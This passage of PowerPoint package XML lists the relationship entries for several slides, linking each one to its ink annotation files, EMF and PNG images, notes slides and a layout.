Target="../media/image22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48.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2170.emf"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2211.emf"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink461.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink452.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image225.emf"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image229.emf"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink465.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image233.emf"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink469.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink445.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide60.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2160.emf"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink456.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink447.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2200.emf"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image224.emf"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink460.xml"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image228.emf"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink464.xml"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink468.xml"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image237.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink444.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink451.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2100.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink446.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2150.emf"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2190.emf"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink455.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2230.emf"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink459.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink463.xml"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image232.emf"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image236.emf"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2120.emf"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink467.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink443.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2140.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink450.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink454.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink458.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image227.emf"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image231.emf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2180.emf"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink462.xml"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23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0.emf"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink449.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink453.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2220.emf"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image226.emf"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink466.xml"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink470.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2130.emf"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink457.xml"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image230.emf"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image234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emf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink476.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image245.emf"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image249.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink471.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink480.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink473.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image242.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink478.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink482.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide61.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image244.emf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image246.emf"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink4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9.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink475.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image248.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink472.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink477.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink481.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image250.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image241.emf"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink479.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image238.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink474.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image243.emf"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image247.emf"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink483.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image251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emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink485.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink487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3.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink486.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image25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93.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image259.emf"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image263.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink488.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink497.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image267.emf"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink490.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image256.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink495.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink499.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink503.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide66.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image258.emf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image260.emf"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink50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32.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink492.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image262.emf"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image266.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink489.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink494.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink498.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image264.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image255.emf"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink496.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink502.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2522.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink491.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image257.emf"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image261.emf"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink500.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image265.emf"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2542.e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06.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image273.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image270.emf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink508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05.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image272.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image269.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink507.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink504.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image271.emf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide6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514.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2732.emf"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image277.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink509.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink518.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image281.emf"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink511.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2702.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink516.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink520.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink524.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide69.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2722.emf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image274.emf"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink5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72.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink513.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image276.emf"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image280.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink510.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink515.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink519.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image278.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2692.emf"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink517.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink523.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2662.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink512.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2712.emf"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image275.emf"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink521.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image279.emf"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image26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emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink526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6.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink525.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42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customXml" Target="../ink/ink529.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image43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28.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image289.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink527.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image291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emf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink535.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image299.emf"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image303.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink530.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink539.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink532.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image296.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink537.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink541.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide73.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image298.emf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image300.emf"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink5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3.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink534.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image302.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink531.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink536.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink540.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image304.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image295.emf"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink538.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image292.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink533.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image297.emf"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image301.emf"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink542.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image305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1.emf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink549.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image310.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink544.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink553.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink546.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image307.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink551.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide76.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image309.emf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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51.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink548.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink545.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink550.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2371.emf"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink552.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2340.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink547.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image308.emf"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image312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16.emf"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink564.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink555.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image320.emf"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image324.emf"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink557.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink561.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image322.emf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide78.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2430.emf"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink559.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink565.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image315.emf"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image319.emf"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink563.xml"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image323.emf"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink556.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image317.emf"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image321.emf"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink560.xml"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image325.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink554.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image314.emf"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink558.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image318.emf"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink562.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink566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0.emf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink572.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2420.emf"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image326.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink567.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink576.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink569.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2390.emf"/><Relationship Id="rId17" 